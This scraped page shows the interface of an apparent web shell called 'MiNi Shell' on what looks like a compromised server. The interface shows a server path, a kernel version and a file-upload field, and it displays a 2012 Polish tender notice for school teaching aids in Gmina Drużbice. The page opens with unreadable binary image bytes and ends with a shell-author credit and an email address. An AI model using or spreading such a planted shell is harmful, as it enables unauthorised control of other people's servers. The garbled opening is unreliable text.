JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/408118-N-2012.html

<p class="kh_header"><b>Drużbice: Zakup i dostawa pomocy dydaktycznych w ramach
realizacji projektu /Korzystaj z szans, rozwijaj zdolności, dołącz do najlepszych/ w szkołach podstawowych w Gminie Drużbice</b><br>
<b>Numer ogłoszenia: 408118 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Drużbice , Drużbice 77A, 97-403 Drużbice, woj. łódzkie, tel. 044 6311078 (79), faks 044 6311259.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.druzbice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa pomocy dydaktycznych w ramach
realizacji projektu /Korzystaj z szans, rozwijaj zdolności, dołącz do najlepszych/ w szkołach podstawowych w Gminie Drużbice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup i dostawa pomocy dydaktycznych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Drużbice  w ramach projektu /Korzystaj z szans, rozwijaj zdolności, dołącz do najlepszych/ współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki.

1.1. Materiały dydaktyczne stanowiące przedmiot zamówienia muszą być dostosowane dla dzieci uczęszczających do I-III klasy szkoły podstawowej oraz posiadać aktualne atesty i certyfikaty na bezpieczeństwo i zgodność z wymaganiami polskich i europejskich norm.

1.2. Wykonawca zobowiązany jest dostarczyć materiały dydaktyczne w pogrupowanych i opisanych niżej pakietach:

Zespół Szkolno - Przedszkolny w Drużbicach:

Pakiet 1 - Pomoce dydaktyczne do zajęć dla uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno - przyrodniczych:

1.	Stacja meteorologiczna - 1 szt.   
Przyrządy niezbędne do obserwacji podstawowych parametrów klimatycznych: temperatury powietrza, prędkości i kierunku wiatru, opadów atmosferycznych. Pomoc powinna posiadać wbudowany zegar słoneczny.

2.	Układ słoneczny - 1 szt.    

Model ruchomy systemu planetarnego 9 planet, sterowany na baterie (baterie na wyposażeniu), podświetlany. Wymagany lektor w języku polskim.

3.	Zestaw do eksperymentów technicznych - 1 szt. 

Zestaw winien zawierać m.in. następujące eksperymenty: labirynt elektryczny, unosząca się piłka, mini odkurzacz, dmuchawa do baniek, latający talerz, filtr kolorów, ruchome elementy.

4.	Videomikroskop - 1 szt.   

Mikroskop z ekranem, na baterie. Powinien posiadać kilka rodzajów powiększenia   w przedziale od 20x do maksimum 100x . Pomoc powinna zawierać niezbędne wyposażenie tj. szkiełka z preparatami, szkiełka podstawowe, nakrywki do szkiełek, pojemniczki, szalkę Petriego ze szkłem powiększającym, menzurkę, pęsetę, pipetkę, mieszadełko.

Pakiet 2 - Pomoce dydaktyczne do zajęć dla uczniów ze specyficznymi trudnościami  w czytaniu i pisaniu, w tym także zagrożonych dysleksją:

5.	Alfabet małe litery - 1 szt.   

Alfabet małe litery pisane - szorstkie. Na płytkach pokrytych w zależności od rodzajów głosek różnym kolorem tła znajdują się małe litery pisane. Poprzez wodzenie palcem po szorstkiej powierzchni liter dziecko będzie mogło poznać nie tylko kształt liter, prawidłowy kierunek wodzenia palcem, ale i pobudzić swoją percepcję sensoryczną. 

6.	Alfabet duże litery - 1 szt.   

Alfabet duże litery pisane - szorstkie. Uzupełnienie w/w kompletu małych liter.

Pakiet 3 - pomoce dydaktyczne do zajęć dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych:

7.	Liczydło stojące - 1 szt.   

Duże liczydło na stojaku. Korale w minimum 2 kolorach.

8.	Waga - 2 szt.    

Waga o plastikowych, przezroczystych pojemnikach do 500 ml z podziałkami.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
9.	Plansze magnetyczne - 4 szt. 

Magnetyczna plansza oraz zestaw magnetycznych elementów do ćwiczeń z zakresu podstawowych operacji matematycznych. Plansza winna być wyposażona w otwory do wieszania na ścianie. 

Pakiet 4 - pomoce do zajęć logopedycznych:

10.	 Program multimedialny  Mówiące obrazki - 1 szt.   

Logopedyczne gry i zabawy dla dzieci, program przeznaczony do nauki rozróżniania otaczających dźwięków, pomocny w terapii dzieci z zaburzeniami słuchu i rozwoju języka. Program ten ma pomóc dzieciom uczyć się rozróżniania dźwięków i korzystnie wpłynąć na rozwój funkcji słuchowych. Powinien zawierać interaktywne ilustracje i animacje, które dodatkowo urozmaicą proces terapii.

Pakiet 5 - pomoce dydaktyczne do zajęć socjoterapeutycznych i psychoedukacyjnych dla uczniów z zaburzeniami komunikacji społecznej:

11.	Historyjki /Jak to naprawić/ - 1 szt.   

Powinny to być historyjki, które pomagają w tworzeniu poprawnych relacji międzyludzkich i uwrażliwianiu na sytuacje problemowe takie jak np. kradzież, przemoc itp. 


Szkoła Podstawowa w Wadlewie

Pakiet 1 - Pomoce dydaktyczne do zajęć dla uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno - przyrodniczych:

1.	Zestaw /Oszczędzamy wodę/ - 1 szt.    

Winna to być seria historyjek obrazkowych przedstawiających dzieci, które uczą się jak oszczędzać wodę.

2.	Szkielet człowieka - 1 szt.   

Model szkieletu wykonany z tworzywa sztucznego, którego elementy łatwo łączą się ze sobą. Pomocny w zapoznawaniu dzieci z budową człowieka. Wysokość tego szkieletu winna wynosić. minim. 45 cm.

3.	Wiatrometr - 1 szt.   

Przyrząd umożliwiający obserwacje i pomiar siły wiatru. Wykonany z plastiku, posiadający wskaźnik odwzorowujący siłę wiatru.

4.	Mikroskop /Jajo/ - 1 szt.    

Mikroskop i kamera w jednym, posiadający możliwość podłączenia do komputera. Mikroskop winien również umożliwiać robienie zdjęć oglądanym obiektom.

Pakiet 2 - Pomoce dydaktyczne do zajęć dla uczniów ze specyficznymi trudnościami  w czytaniu i pisaniu, w tym także zagrożonych dysleksją:

5.	Kącik manipulacyjny domek - 1 szt.   

Ścianki, na których zamieszczono elementy do manipulacji: przesuwanka, figury geometryczne, labirynt. Pomoc ma zachęcić dzieci do skupienia i zwrócenia uwagi na kolorowe elementy oraz rozwijać motorykę i sprawność manualną dłoni. 

6.	Labirynt na ścianę - 1 szt.   

Labirynt na ścianę z przesuwanymi kształtami. Pomoc ta ma ćwiczyć sprawność manualną i koordynację wzrokowo-ruchową.

7.	Detektyw Ortografek - 1 szt.    

Ortograficzne ćwiczenia percepcji wzrokowej i koncentracji uwagi. Pomoc dla uczniów z dysleksją lub innymi trudnościami w nauce.

Pakiet 3 - pomoce dydaktyczne do zajęć dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych:

8.	Waga - 1 szt.  

Waga o plastikowych, przezroczystych pojemnikach do 500 ml z podziałkami.

Pakiet 4 - pomoce do zajęć logopedycznych:

9.	Teatrzyk  stragan - 1 szt.   

Pomoc dydaktyczna umożliwiająca odgrywanie teatrzyków lalkowych. Produkt zapewnia zabawę kilku osobom. Winien być wykonany z drewna i kolorowej tkaniny.

10.	 Piramida logopedyczna - 1 szt.    

Dotyczy spółgłosek: (ś-ż-ć-dż) oraz (p-b, d-t, w-f). Budowanie piramidy odbywa się na zasadzie gry w domino. Zabawa ma rozwijać zdolność myślenia i zapamiętywania oraz wzmacniać koncentrację.


1.3. Podane w opisach nazwy własne (tytuł, artykuł) nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113 poz. 759 z późn. zm.), określają jedynie minimalne wymagania Zamawiającego co do funkcji, które winny spełniać poszczególne pozycje asortymentowe składające się na przedmiot zamówienia i mają za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne, pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego. Wykonawca w takim przypadku zobowiązany jest wykazać, że oferowane przez niego pomoce dydaktyczne spełniają wymagania określone przez Zamawiającego, w szczególności przez dokładne opisy oferowanych produktów.


1.4.  Przedmiot zamówienia tj. pomoce dydaktyczne Wykonawca zobowiązany jest dostarczyć do siedziby Zamawiającego.


1.5. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości na okres min. 12 miesięcy, od dnia odbioru dostawy przez Zamawiającego, co potwierdzone zostanie odpowiednim protokołem zdawczo-odbiorczym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 39.16.22.00-7, 37.52.41.00-8, 22.11.00.00-4, 22.11.20.00-8, 22.83.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru określonego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru określonego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru określonego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru określonego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru określonego w załączniku nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie:
1.Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty złożonej przez Wykonawcę przy zachowaniu następujących warunków:
1) przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
2)  podwykonawców, pod warunkiem, że zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
3) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia, bądź gdy konieczność zmiany związana jest ze zmianą powszechnie obowiązujących przepisów prawa                      (np.  w zakresie zmiany wysokości stawki podatku VAT lub podatku akcyzowego).
4) Poza w/w sytuacjami zmiany umowy będą mogły nastąpić w następujących przypadkach:
a) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy, 
b) albo gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający dopuszcza możliwość zmiany umowy. 
2. Zamawiający dopuszcza nieistotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli wiedza o ich wprowadzeniu do umowy na etapie postępowania nie wpłynęłaby na krąg podmiotów ubiegających się o niniejsze zamówienie i wynik postępowania oraz jeżeli zmiany te nie naruszą zasady równego traktowania Wykonawców ubiegających się o zamówienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.druzbice.pl , www.druzbicegw.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Drużbice, Drużbice 77A, 97-403 Drużbice, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:30, miejsce: Urząd Gminy Drużbice, Drużbice 77A, 97-403 Drużbice, pokój nr 10 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfiansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com